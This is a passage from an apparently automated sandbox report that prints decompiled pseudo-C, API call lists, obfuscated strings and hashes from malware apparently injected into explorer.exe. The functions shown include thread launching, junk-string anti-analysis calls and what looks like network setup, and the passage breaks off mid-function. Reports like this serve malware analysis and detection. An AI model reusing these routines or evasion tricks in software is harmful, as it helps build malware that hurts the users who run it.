							return _v12;
						} else {
							goto L33;
						}
						while(1) {
							L33:
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						_v12 = 0xfffffffc;
						goto L40;
					}
					if(__eflags < 0) {
						L31:
						CreateEnhMetaFileA(0, "oj,fdO6SiymTR zxgDJPFBZX9U8E827d0LaG9F43Jiko0P191OI sQXXFkaTy2AD 510N0A6l6czfVEyfPyNMB,d9h8XR99Z2ZNAPkr6c6x0tu0o8wXsZZN lS2t jIwmaRaxoJAQ4pjHDMgbEIhWRn X0UXLELvrq6aA8LYCtn.L5w1S FUaFvqk4.NLqRER4krz ,2oF1HKEFCdNk54YRe6UeCnNf275BSTRbdTeHiT3zBvPhVkIvyF5lS,9Z .Lye sa4V 0Wl79W8fN7pQ  AWDreN4DF,.Najxbq86aOBRzZXwKm8ScckDPHZTFO.e VxZrpmdH0wMc8ZzgMoOrwT gvWHF1z6Xf.wCx6RV0EU8rACO2eI  qZe .PtIff7accPJQXCM2vVE9.YqYtjVdKymGiRjb93YS w2UXM5Gba hTOK8.MfMA71.v plsFDRtzSoINGmwkJU 3mQrfg0bEUdtEhzz.bap 5b,CH5IsnMP2upng4zeDzIT75SROPq.Bn31 Sbtced1rO8U CBXysPQTKEb5Bi64XqqyQyf zGnRJMx0w4yN77bN6neCkFdc T,wSCcLzaFr.nxb,3yprhAss8D.,lqR uBb4OKeipGJxCmKN,2h0EQgs r3mTz7bAVJezYkChyijmCJeMoPvyZjAG0upcslKiQ5fUmspCU8s4CJQzmFoaXHUi 3FsFBO2OH6SWXjtdMsat,U4t.Zux1NvEkdu78qFD,t0pc ,lP6, 3Iboi9128IF3xCv5OWzv  YMjgvTfpr x 2 uow7aZZTopoIF0BNne8CqSHrE3iD7YH1qtMB6Sq6QbH2uUVxyGkM aMgAMI LqwcPisN5qSeUHjDuqywUPQdUJ5Yfo.m Px6,WCS 6ufswlL8vuy0d1V,qnx63AmOOAxkjGp5  a74dyFWWQH8lOYO1pTfWo9UrrT.9reXOjFP2 yo2JhayrFgL2FbnMDTezpKNnDtarWi kuy.Xidr MrUdkYoObWC7bCkyIlW,YvN74kR285klVoX8gPnVTlVHITUl69S2ylp9KqnFyMkzuUg7NgjdPXHpVRYuHNEllUmlL1cT5gb,Du.N,ID2PITEx7RuepxX B.U8,M7yAb2XKUPnsOFc ChlYkfhPoa,u88kFi8zcsgdaab58HaX5,cQDkgyF4PiO qbtL7qWcUIrPGzm1SZvpNltzp .gdXVDFkBLomvCLUibO7DsQwsYsXs9 r U49v2zHep6wDJ2aAH2UfA ayCugq87Uv6atITS1ci4DMvWrc  lvldkMGuZ7dPQYY1rm4XTi39Jn1eq3a8DVSQa LAvS1MRF6IN5TQ8NYIWfFA0 uu ubWcwT4xy9H64d.wEySGm4hwG hB2WiilM PU5CqqavCbXhKvS3M OliKH6 aXS QI76xRC3bDHKiq3EWv1AV8ZafvhpGCaHZqOwWcPGwnQR jCmvpl6DLRR94vrfxdmaMBUfhz4dVfdraXlBeYCgjcE6th7dqsKhvS2PPUROhruLiwrLCp xk RNlpAKdkx1oqlutvWpeSWkd.VphHy7b6HstY7jXxxitlEIS,KsLKMvwyIqwvUDgOtkcWwg.FaGjuUzYop RYBsLkKuCx7hkEw jZC98Jg wj.5rwO6xohV5h3c7jrtILZJTYj zEzBWxFPCj0dvlYVxv i IgTMazLKXiq9Ly YeUalb7b mMh8SqBq8Ur,WNBNtmduL,amC, rJghg9bWmrBodw vkQZkLkzyE0vQ4BcZZESzHCSEivMOmmEmRdJRi85CH 1Fip  MarkJwmXNHWtJNPB9d0oRY", 0, 0);
						goto L32;
					}
					__eflags = _v148 - 0x2bcf;
					if(_v148 >= 0x2bcf) {
						goto L32;
					}
					goto L31;
				} else {
					_t130 = 0xfffffffe;
					return _t130;
				}
			}

0x00f56941
0x00f5694a
0x00f5694e
0x00f56952
0x00f56956
0x00f5695a
0x00f5695e
0x00f56962
0x00f56975
0x00f5697b
0x00f5697c
0x00f56988
0x00f5698f
0x00f56994
0x00f56999
0x00f569a9
0x00f569b0
0x00f569ba
0x00f569c7
0x00f569ca
0x00f569cd
0x00000000
0x00000000
0x00f569d6
0x00f569d9
0x00f569df
0x00f569e2
0x00f569c3
0x00f569c3
0x00f569c4
0x00000000
0x00f569c4
0x00f569f0
0x00f569f6
0x00f569f9
0x00f569fd
0x00f56a1e
0x00f56a21
0x00f56a24
0x00f56a27
0x00f56a2c
0x00f56a39
0x00f56a39
0x00f56a3b
0x00000000
0x00000000
0x00f56a3d
0x00f56a45
0x00f56a53
0x00f56a56
0x00f56a5a
0x00f56a6b
0x00f56a5c
0x00f56a5c
0x00f56a5c
0x00f56a77
0x00f56a7a
0x00f56a7e
0x00f56a8b
0x00f56a8e
0x00f56a91
0x00000000
0x00000000
0x00f56a9c
0x00f56ab0
0x00f56a87
0x00f56a87
0x00f56a88
0x00f56a88
0x00f56abb
0x00f56abe
0x00f56ac1
0x00f56ac1
0x00f56ac1
0x00f56ac6
0x00f56acd
0x00000000
0x00000000
0x00000000
0x00000000
0x00f56a2e
0x00f56a2e
0x00f56a2e
0x00f56a30
0x00000000
0x00000000
0x00f56a32
0x00000000
0x00f56a34
0x00f569ff
0x00f56a0d
0x00f56a18
0x00000000
0x00f56a18
0x00f56a01
0x00f56a0b
0x00000000
0x00000000
0x00000000
0x00f56a0b
0x00f56adc
0x00f56ae2
0x00f56ae8
0x00f56aef
0x00f56b10
0x00f56b13
0x00f56b16
0x00f56b27
0x00f56b2b
0x00f56b3f
0x00f56b4b
0x00f56b52
0x00f56b54
0x00f56b5f
0x00f56b56
0x00f56b56
0x00f56b56
0x00f56b54
0x00f56b66
0x00f56b66
0x00f56b66
0x00f56b68
0x00000000
0x00000000
0x00f56b6a
0x00f56b73
0x00000000
0x00000000
0x00000000
0x00000000
0x00f56b18
0x00f56b18
0x00f56b18
0x00f56b1a
0x00000000
0x00000000
0x00f56b1c
0x00f56b1e
0x00000000
0x00f56b1e
0x00f56af1
0x00f56aff
0x00f56b0a
0x00000000
0x00f56b0a
0x00f56af3
0x00f56afd
0x00000000
0x00000000
0x00000000
0x00f569b2
0x00f569b4
0x00000000
0x00f569b4

APIs

Part of subcall function 00F577A7: CancelDC.GDI32(00000000,?,?,?,?,00F57700,00000000), ref: 00F5780E
Part of subcall function 00F577A7: BitBlt.GDI32(00000000,0000005D,0000004C,0000000F,00000044,00000000,00000011,0000005D,00000057), ref: 00F578A4

CreateEnhMetaFileA.GDI32(00000000,fNDdKIH T 2TmCSmPfJCGV3IS N Gm2i2lz xNid7y8L8mPhGdG6IOTQL9VnC2mViPvVT3ozXi9Z0HAWSm437 9V3PH,S Q3uhM18,9 7lsLQ 5 60ZRZ1BVDgZfukmKhbROJv9oBJWxP jxonoYB6IWYf13xCJ0xxLaL3Wy ME77oGLOkH6gzUPLfkw4HDnNGduB1HqTkQfhM9FBeM lQWAOYwPZyGoUBJ We2pB5tkHnyaFOfM9WEjXiiKFGpZ5F9,00000000,00000000), ref: 00F56A18
GetLastError.KERNEL32 ref: 00F56A3F
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 00F56AB0
CreateEnhMetaFileA.GDI32(00000000,oj,fdO6SiymTR zxgDJPFBZX9U8E827d0LaG9F43Jiko0P191OI sQXXFkaTy2AD 510N0A6l6czfVEyfPyNMB,d9h8XR99Z2ZNAPkr6c6x0tu0o8wXsZZN lS2t jIwmaRaxoJAQ4pjHDMgbEIhWRn X0UXLELvrq6aA8LYCtn.L5w1S FUaFvqk4.NLqRER4krz ,2oF1HKEFCdNk54YRe6UeCnNf275BSTRbdTeHiT3zBvPhVkIvyF5lS,9Z .Lye,00000000,00000000), ref: 00F56B0A

Part of subcall function 00F5CEF9: GetSystemTimeAsFileTime.KERNEL32(?,?,00F54CCA,00000000), ref: 00F5CF03
Part of subcall function 00F5CEF9: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F5CF23

BitBlt.GDI32(00000000,00000029,00000017,0000005B,00000031,00000000,0000000A,00000036,00000016), ref: 00F56B3F

Strings

fNDdKIH T 2TmCSmPfJCGV3IS N Gm2i2lz xNid7y8L8mPhGdG6IOTQL9VnC2mViPvVT3ozXi9Z0HAWSm437 9V3PH,S Q3uhM18,9 7lsLQ 5 60ZRZ1BVDgZfukmKhbROJv9oBJWxP jxonoYB6IWYf13xCJ0xxLaL3Wy ME77oGLOkH6gzUPLfkw4HDnNGduB1HqTkQfhM9FBeM lQWAOYwPZyGoUBJ We2pB5tkHnyaFOfM9WEjXiiKFGpZ5F9, xrefs: 00F56A11
8T7O3PdhCnrRyRGM5thUwIYYbbqr nKZxsJKnu6VAkdoISHexo.dDz.qwTjajEVSpHGCUyQuouXplk lvXiPwwCUyKT fLyKRFQvyYkAh8ctwMabVC3Nx..Z8KB7VeowKpUW2,tSnKJSPK4OMqw0JgcNmC0DPTnr0xtRZU39dVk6iSHgZnypSlby,vQ88Q8Mvy OJOqQnwIk5sWbuEVwX4pOzj6kzMFAoHfcWGX5lxsfCL rZFNv,ZTatVDRL3XcG64, xrefs: 00F56A48
oj,fdO6SiymTR zxgDJPFBZX9U8E827d0LaG9F43Jiko0P191OI sQXXFkaTy2AD 510N0A6l6czfVEyfPyNMB,d9h8XR99Z2ZNAPkr6c6x0tu0o8wXsZZN lS2t jIwmaRaxoJAQ4pjHDMgbEIhWRn X0UXLELvrq6aA8LYCtn.L5w1S FUaFvqk4.NLqRER4krz ,2oF1HKEFCdNk54YRe6UeCnNf275BSTRbdTeHiT3zBvPhVkIvyF5lS,9Z .Lye, xrefs: 00F56B03

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: File$CreateMetaTime$ByteCancelCharErrorLastMultiSystemUnothrow_t@std@@@Wide__ehfuncinfo$??2@
String ID: 8T7O3PdhCnrRyRGM5thUwIYYbbqr nKZxsJKnu6VAkdoISHexo.dDz.qwTjajEVSpHGCUyQuouXplk lvXiPwwCUyKT fLyKRFQvyYkAh8ctwMabVC3Nx..Z8KB7VeowKpUW2,tSnKJSPK4OMqw0JgcNmC0DPTnr0xtRZU39dVk6iSHgZnypSlby,vQ88Q8Mvy OJOqQnwIk5sWbuEVwX4pOzj6kzMFAoHfcWGX5lxsfCL rZFNv,ZTatVDRL3XcG64$fNDdKIH T 2TmCSmPfJCGV3IS N Gm2i2lz xNid7y8L8mPhGdG6IOTQL9VnC2mViPvVT3ozXi9Z0HAWSm437 9V3PH,S Q3uhM18,9 7lsLQ 5 60ZRZ1BVDgZfukmKhbROJv9oBJWxP jxonoYB6IWYf13xCJ0xxLaL3Wy ME77oGLOkH6gzUPLfkw4HDnNGduB1HqTkQfhM9FBeM lQWAOYwPZyGoUBJ We2pB5tkHnyaFOfM9WEjXiiKFGpZ5F9$oj,fdO6SiymTR zxgDJPFBZX9U8E827d0LaG9F43Jiko0P191OI sQXXFkaTy2AD 510N0A6l6czfVEyfPyNMB,d9h8XR99Z2ZNAPkr6c6x0tu0o8wXsZZN lS2t jIwmaRaxoJAQ4pjHDMgbEIhWRn X0UXLELvrq6aA8LYCtn.L5w1S FUaFvqk4.NLqRER4krz ,2oF1HKEFCdNk54YRe6UeCnNf275BSTRbdTeHiT3zBvPhVkIvyF5lS,9Z .Lye
API String ID: 365199744-1138318867
Opcode ID: 5422bb0f8426932c450c177b763aac7a5332ba59e238fa52388fcb1aa72f120e
Instruction ID: d72e3f009af6a36fedbe91d0cecf454120468315889c0d561ad05d70c6da2019
Opcode Fuzzy Hash: 5422bb0f8426932c450c177b763aac7a5332ba59e238fa52388fcb1aa72f120e
Instruction Fuzzy Hash: 9E714A71D04209AFDB10CBA4DC45BADB7B0BB04326F608059EA25FB1C1DB789A88EB55

Uniqueness

Uniqueness Score: -1.00%

Function 00F548C2, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 111
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			_entry_(void* __ebx, void* __edx, void* __esi, struct HINSTANCE__* _a4, void* _a8) {
				void* _v8;
				char _v9;
				char _v16;
				char _v24;
				short _v88;
				short _v608;
				void* _t25;
				void* _t29;
				struct HINSTANCE__* _t30;
				long _t31;
				long _t32;
				intOrPtr _t35;
				void* _t42;
				void* _t43;
				void* _t48;
				void* _t53;
				void* _t56;
				intOrPtr* _t57;
				void* _t60;

				_t53 = __esi;
				_t51 = __edx;
				_t42 = __ebx;
				if(_a8 != 1) {
					__eflags = _a8;
					if(_a8 == 0) {
						TerminateThread( *0xf89738, 0);
					}
					L15:
					E00F54CBA(_t51);
					L16:
					__eflags = 1;
					return 1;
				}
				E00F5ABD0();
				_t25 = E00F5CEF9(__edx,  &_v16);
				_t60 = __edx;
				if(_t60 > 0 || _t60 >= 0 && _t25 >= 0x2c643) {
					_push(_t42);
					_push(_t53);
					E00F5B749();
					 *0xf8973c = GetModuleHandleA(0);
					GetLastError();
					_t29 = E00F5ACD6("0KabXl bH0tOp9 YQcQTMkM2N9nsYBV0Tn7uz718UfjEG e.iyU4FPH i5Orr2FP p.sKjZc903PQ13P6sgWnSTmSX8y i3gUDAEdyloiXodkNFASKWSqQ,1nxgebUEaQMVtpVB M.BS 8LsGUybGOivpQc0rEyk2KiW,ZrRxzGJNyUfA HlVn16HkSjzIuyQRvKPlP6r.MXgawmXWvOwrC nxQT jHvzB.TrVnQ8.oqQUwaK 4uz6fsEbLrL7Qxy5YHSy4SiQd6Zo2fP9tcvC6eSzOX8gqUQYmD");
					_t48 = 0xf;
					_a8 = _t48;
					if(_t29 <= _t48) {
						_a8 = _t29;
					}
					_t43 = 0;
					_v9 = 0;
					if(_a8 <= 0) {
						L8:
						_t30 = _a4;
						 *0xf89754 = _t30;
						_t31 = GetModuleFileNameW(_t30,  &_v608, 0x104);
						_t32 = GetLastError();
						if(_t31 != 0) {
							__eflags = _t32 - 0x7a;
							if(_t32 == 0x7a) {
								goto L9;
							}
							E00F6D3F9( *0xf89754);
							 *_t57 = 0x50c;
							_t35 = E00F5F138();
							 *0xf89740 = _t35;
							_v8 = 0;
							 *0xf89738 =  *((intOrPtr*)(_t35 + 0x70))(0, 0, E00F545A3, 0, 0,  &_v8, 0xf7b218, 0x11c);
							BitBlt(0, 0x2f, 0x17, 0x4f, 0x25, 0, 3, 0x61, 0x55);
							__eflags =  *0xf89738; // 0x2d4
							if(__eflags != 0) {
								goto L15;
							}
						}
						L9:
						return 0;
					} else {
						do {
							_t7 = _t43 + 0x42; // 0x42
							 *((char*)(_t56 + _t43 - 0x14)) = _t7;
							MultiByteToWideChar(0, 0,  &_v24, 0xffffffff,  &_v88, 0x20);
							_t43 = _t43 + 1;
						} while (_t43 < _a8);
						goto L8;
					}
				} else {
					goto L16;
				}
			}

0x00f548c2
0x00f548c2
0x00f548c2
0x00f548d0
0x00f549ed
0x00f549f1
0x00f549fb
0x00f549fb
0x00f54a01
0x00f54a01
0x00f54a06
0x00f54a08
0x00000000
0x00f54a08
0x00f548d6
0x00f548df
0x00f548e7
0x00f548e9
0x00f548fc
0x00f548fd
0x00f548fe
0x00f54910
0x00f54915
0x00f5491c
0x00f54924
0x00f54925
0x00f5492a
0x00f5492c
0x00f5492c
0x00f5492f
0x00f54931
0x00f54938
0x00f5495b
0x00f5495b
0x00f5496b
0x00f54970
0x00f54978
0x00f5497e
0x00f54987
0x00f5498a
0x00000000
0x00000000
0x00f54992
0x00f54997
0x00f549a8
0x00f549bd
0x00f549c2
0x00f549d8
0x00f549dd
0x00f549e3
0x00f549e9
0x00000000
0x00000000
0x00f549eb
0x00f54980
0x00000000
0x00f5493a
0x00f5493a
0x00f5493c
0x00f5493f
0x00f5494f
0x00f54955
0x00f54956
0x00000000
0x00f5493a
0x00000000
0x00000000
0x00000000

APIs

TerminateThread.KERNEL32(00000000), ref: 00F549FB

Part of subcall function 00F5ABD0: HeapCreate.KERNELBASE(00000000,00080000,00000000,00F548DB), ref: 00F5ABD9

Part of subcall function 00F5CEF9: GetSystemTimeAsFileTime.KERNEL32(?,?,00F54CCA,00000000), ref: 00F5CF03
Part of subcall function 00F5CEF9: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F5CF23

GetModuleHandleA.KERNEL32(00000000), ref: 00F54904
GetLastError.KERNEL32 ref: 00F54915
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 00F5494F
GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 00F54970
GetLastError.KERNEL32 ref: 00F54978
BitBlt.GDI32(00000000,0000002F,00000017,0000004F,00000025,00000000,00000003,00000061,00000055), ref: 00F549DD

Strings

0KabXl bH0tOp9 YQcQTMkM2N9nsYBV0Tn7uz718UfjEG e.iyU4FPH i5Orr2FP p.sKjZc903PQ13P6sgWnSTmSX8y i3gUDAEdyloiXodkNFASKWSqQ,1nxgebUEaQMVtpVB M.BS 8LsGUybGOivpQc0rEyk2KiW,ZrRxzGJNyUfA HlVn16HkSjzIuyQRvKPlP6r.MXgawmXWvOwrC nxQT jHvzB.TrVnQ8.oqQUwaK 4uz6fsEbLrL7Qxy5YH, xrefs: 00F54917

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: ErrorFileLastModuleTime$ByteCharCreateHandleHeapMultiNameSystemTerminateThreadUnothrow_t@std@@@Wide__ehfuncinfo$??2@
String ID: 0KabXl bH0tOp9 YQcQTMkM2N9nsYBV0Tn7uz718UfjEG e.iyU4FPH i5Orr2FP p.sKjZc903PQ13P6sgWnSTmSX8y i3gUDAEdyloiXodkNFASKWSqQ,1nxgebUEaQMVtpVB M.BS 8LsGUybGOivpQc0rEyk2KiW,ZrRxzGJNyUfA HlVn16HkSjzIuyQRvKPlP6r.MXgawmXWvOwrC nxQT jHvzB.TrVnQ8.oqQUwaK 4uz6fsEbLrL7Qxy5YH
API String ID: 4174817557-2141266971
Opcode ID: 768a9ed28d9ef43f42ba92f4203bc89978eb2d441d800292bca04ea8983ea565
Instruction ID: c3947a0fcd09ce5cbf4c5a31aaca16bcbf7fabe75a1b205d4f43274ba8fb6d40
Opcode Fuzzy Hash: 768a9ed28d9ef43f42ba92f4203bc89978eb2d441d800292bca04ea8983ea565
Instruction Fuzzy Hash: 8D310971940208BADB109FA5EC8AFAF3B78EB41716F104029FB04D6191E6B85588FB62

Uniqueness

Uniqueness Score: -1.00%

Function 00F6F588, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 97
stringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00F6F588(signed int __eax, char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t20;
				signed int _t21;
				int _t23;
				char* _t32;
				char* _t34;
				void* _t46;
				signed int _t49;
				char* _t51;
				void* _t52;
				long long* _t55;

				_t20 = __eax;
				if(_a20 == 0) {
					_a20 = 0x11;
				}
				_t34 = _a4;
				_push(_t36);
				 *_t55 = _a12;
				_push(_a20);
				_push("%.*g");
				_push(_a8);
				_push(_t34);
				L00F70750();
				_t49 = _t20;
				if(_t49 >= 0) {
					_a20 = _t49;
					if(_t49 >= _a8) {
						goto L3;
					}
					L00F70762();
					_t23 =  *((intOrPtr*)( *_t20));
					if(_t23 != 0x2e) {
						_t32 = strchr(_t34, _t23);
						if(_t32 != 0) {
							 *_t32 = 0x2e;
						}
					}
					if(strchr(_t34, 0x2e) != 0 || strchr(_t34, 0x65) != 0) {
						L12:
						_t51 = strchr(_t34, 0x65);
						if(_t51 == 0) {
							L20:
							_t21 = _a20;
							L21:
							return _t21;
						}
						_t52 = _t51 + 1;
						_t15 = _t52 + 1; // 0x2
						_t46 = _t15;
						if( *_t52 == 0x2d) {
							_t52 = _t46;
						}
						while( *_t46 == 0x30) {
							_t46 = _t46 + 1;
						}
						if(_t46 != _t52) {
							memmove(_t52, _t46, _a20 - _t46 + _t34);
							_a20 = _a20 + _t52 - _t46;
						}
						goto L20;
					} else {
						_t9 = _t49 + 3; // 0x4
						_t20 = _t9;
						if(_t20 >= _a8) {
							goto L3;
						}
						_t34[_t49] = 0x302e;
						( &(_t34[2]))[_t49] = 0;
						_a20 = _t49 + 2;
						goto L12;
					}
				}
				L3:
				_t21 = _t20 | 0xffffffff;
				goto L21;
			}

0x00f6f588
0x00f6f58f
0x00f6f591
0x00f6f591
0x00f6f59c
0x00f6f5a1
0x00f6f5a2
0x00f6f5a5
0x00f6f5a8
0x00f6f5ad
0x00f6f5b0
0x00f6f5b1
0x00f6f5b6
0x00f6f5bd
0x00f6f5c7
0x00f6f5cd
0x00000000
0x00000000
0x00f6f5cf
0x00f6f5d6
0x00f6f5da
0x00f6f5e1
0x00f6f5ea
0x00f6f5ec
0x00f6f5ec
0x00f6f5ea
0x00f6f5fb
0x00f6f624
0x00f6f62c
0x00f6f632
0x00f6f664
0x00f6f664
0x00f6f667
0x00f6f66a
0x00f6f66a
0x00f6f634
0x00f6f639
0x00f6f639
0x00f6f63c
0x00f6f63e
0x00f6f63e
0x00f6f643
0x00f6f642
0x00f6f642
0x00f6f64a
0x00f6f656
0x00f6f660
0x00f6f660
0x00000000
0x00f6f60b
0x00f6f60b
0x00f6f60b
0x00f6f611
0x00000000
0x00000000
0x00f6f613
0x00f6f619
0x00f6f621
0x00000000
0x00f6f621
0x00f6f5fb
0x00f6f5bf
0x00f6f5bf
0x00000000

APIs

_snprintf.MSVCRT ref: 00F6F5B1
localeconv.MSVCRT ref: 00F6F5CF
strchr.MSVCRT ref: 00F6F5E1
strchr.MSVCRT ref: 00F6F5F2
strchr.MSVCRT ref: 00F6F600
strchr.MSVCRT ref: 00F6F627
memmove.MSVCRT ref: 00F6F656

Strings

%.*g, xrefs: 00F6F5A8

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: strchr$_snprintflocaleconvmemmove
String ID: %.*g
API String ID: 3793506855-952554281
Opcode ID: ef50a2056ca4b495624ec07a4eaeedbe7841c7a913bf066f6d9d587accaae152
Instruction ID: 2f99955b0e814660d972e49d2daedb005a4a995da96c0e2a41042599398f14ff
Opcode Fuzzy Hash: ef50a2056ca4b495624ec07a4eaeedbe7841c7a913bf066f6d9d587accaae152
Instruction Fuzzy Hash: E52157728047169EDB255F24EC82BAB3BD8EF11370F14402AF8498A191DB75EC49E7E1

Uniqueness

Uniqueness Score: -1.00%

Function 00F6FC6D, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 70
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E00F6FC6D(signed int* _a4) {
				signed int _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				char _v20;
				struct HINSTANCE__* _t14;
				_Unknown_base(*)()* _t15;
				void* _t17;
				_Unknown_base(*)()* _t18;
				void* _t23;
				void* _t25;
				signed int _t28;
				struct HINSTANCE__* _t31;
				intOrPtr* _t32;
				void* _t37;

				_v8 = _v8 & 0x00000000;
				_t14 = GetModuleHandleA("advapi32.dll");
				_t31 = _t14;
				if(_t31 != 0) {
					_t15 = GetProcAddress(_t31, "CryptAcquireContextA");
					_v12 = _t15;
					if(_t15 == 0) {
						L7:
						_t17 = 1;
						L11:
						return _t17;
					}
					_t18 = GetProcAddress(_t31, "CryptGenRandom");
					_v16 = _t18;
					if(_t18 == 0) {
						goto L7;
					}
					_t32 = GetProcAddress(_t31, "CryptReleaseContext");
					if(_t32 == 0) {
						goto L7;
					}
					_push(0xf0000000);
					_push(1);
					_push(0);
					_push(0);
					_push( &_v8);
					if(_v12() == 0) {
						goto L7;
					}
					_t23 = _v16(_v8, 4,  &_v20);
					 *_t32(_v8, 0);
					if(_t23 != 0) {
						_t28 = 0;
						_t25 = 0;
						do {
							_t28 = _t28 << 0x00000008 |  *(_t37 + _t25 - 0x10) & 0x000000ff;
							_t25 = _t25 + 1;
						} while (_t25 < 4);
						 *_a4 = _t28;
						_t17 = 0;
						goto L11;
					}
					goto L7;
				}
				return  &(_t14->i);
			}

0x00f6fc73
0x00f6fc7d
0x00f6fc83
0x00f6fc87
0x00f6fc9c
0x00f6fc9e
0x00f6fca3
0x00f6fcf1
0x00f6fcf3
0x00f6fd11
0x00000000
0x00f6fd11
0x00f6fcab
0x00f6fcad
0x00f6fcb2
0x00000000
0x00000000
0x00f6fcbc
0x00f6fcc0
0x00000000
0x00000000
0x00f6fcc2
0x00f6fcc7
0x00f6fcc9
0x00f6fccb
0x00f6fcd0
0x00f6fcd6
0x00000000
0x00000000
0x00f6fce1
0x00f6fceb
0x00f6fcef
0x00f6fcf6
0x00f6fcf8
0x00f6fcfa
0x00f6fd02
0x00f6fd04
0x00f6fd05
0x00f6fd0d
0x00f6fd0f
0x00000000
0x00f6fd0f
0x00000000
0x00f6fcef
0x00000000

APIs

GetModuleHandleA.KERNEL32(advapi32.dll,00000044,?,00F8F9B8,?), ref: 00F6FC7D
GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00F6FC9C
GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 00F6FCAB
GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 00F6FCBA

Strings

CryptAcquireContextA, xrefs: 00F6FC96
CryptReleaseContext, xrefs: 00F6FCB4
advapi32.dll, xrefs: 00F6FC78
CryptGenRandom, xrefs: 00F6FCA5

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
API String ID: 667068680-129414566
Opcode ID: 32e3816c3def8619eb9df198aa985cf3ba48b52713f7ce87b6a5cdb328723dca
Instruction ID: 4fbbf0dc13044ad600020f9b3de4de8af415d5453aa894e1e309e676ec511de3
Opcode Fuzzy Hash: 32e3816c3def8619eb9df198aa985cf3ba48b52713f7ce87b6a5cdb328723dca
Instruction Fuzzy Hash: 9011C472E1021E7ADF219A7C9C45BBEBAB8AF44760F204475FD12E3180DA70DA05BB61

Uniqueness

Uniqueness Score: -1.00%

Function 00F60AA3, Relevance: 13.8, APIs: 8, Strings: 1, Instructions: 277
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00F60AA3(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr* _a24, intOrPtr _a28) {
				void* _v12;
				signed int _v16;
				int _v20;
				signed int _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v96;
				intOrPtr _v100;
				char* _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				char* _v116;
				void _v120;
				char _v136;
				void _v391;
				char _v392;
				void _v647;
				char _v648;
				intOrPtr _t122;
				intOrPtr _t130;
				intOrPtr* _t133;
				char _t135;
				intOrPtr _t136;
				intOrPtr _t139;
				intOrPtr _t142;
				intOrPtr _t145;
				intOrPtr _t148;
				intOrPtr _t152;
				signed int _t155;
				intOrPtr _t157;
				intOrPtr _t164;
				signed int _t166;
				intOrPtr _t172;
				intOrPtr _t175;
				intOrPtr _t177;
				intOrPtr _t181;
				intOrPtr _t183;
				intOrPtr _t185;
				void* _t194;
				void* _t204;
				void _t206;
				void* _t207;
				void* _t208;
				intOrPtr _t210;
				intOrPtr _t211;
				void* _t212;

				_t204 = __edx;
				_v36 = 4;
				_v32 = 0;
				_v28 = 1;
				_v12 = 0;
				_v20 = 0;
				_v392 = 0;
				memset( &_v391, 0, 0xff);
				_v648 = 0;
				memset( &_v647, 0, 0xff);
				_v60 = E00F62CB7();
				_v56 = E00F62CB7();
				_v52 = E00F62CB7();
				_v48 = E00F62CB7();
				_t122 = E00F62CB7();
				_t206 = 0x3c;
				_v44 = _t122;
				_v40 = 0;
				memset( &_v120, 0, 0xff);
				_v116 =  &_v136;
				_v104 =  &_v392;
				_v100 = 0x100;
				_v72 = 0x100;
				_push( &_v120);
				_push(0);
				_v112 = 0x10;
				_v76 =  &_v648;
				_v120 = _t206;
				_push(E00F5ACD6(_a4));
				_push(_a4);
				_t130 =  *0xf8971c; // 0x547bc98
				if( *((intOrPtr*)(_t130 + 0x28))() != 0) {
					_v24 = 0;
					do {
						_t133 =  *0xf8971c; // 0x547bc98
						_v16 = 0x8404f700;
						_t211 =  *_t133( *0xf897f8,  *((intOrPtr*)(_t212 + _v24 * 4 - 0x1c)), 0, 0, 0);
						if(_t211 != 0) {
							_t135 = 3;
							_t207 = 4;
							_t198 =  &_v12;
							_v12 = _t135;
							_t136 =  *0xf8971c; // 0x547bc98
							 *((intOrPtr*)(_t136 + 0x14))(_t211, _t135,  &_v12, _t207);
							_t139 =  *0xf8971c; // 0x547bc98
							_v12 = 0x3a98;
							 *((intOrPtr*)(_t139 + 0x14))(_t211, 2,  &_v12, _t207);
							_t142 =  *0xf8971c; // 0x547bc98
							_v12 = 0x493e0;
							 *((intOrPtr*)(_t142 + 0x14))(_t211, 6,  &_v12, _t207);
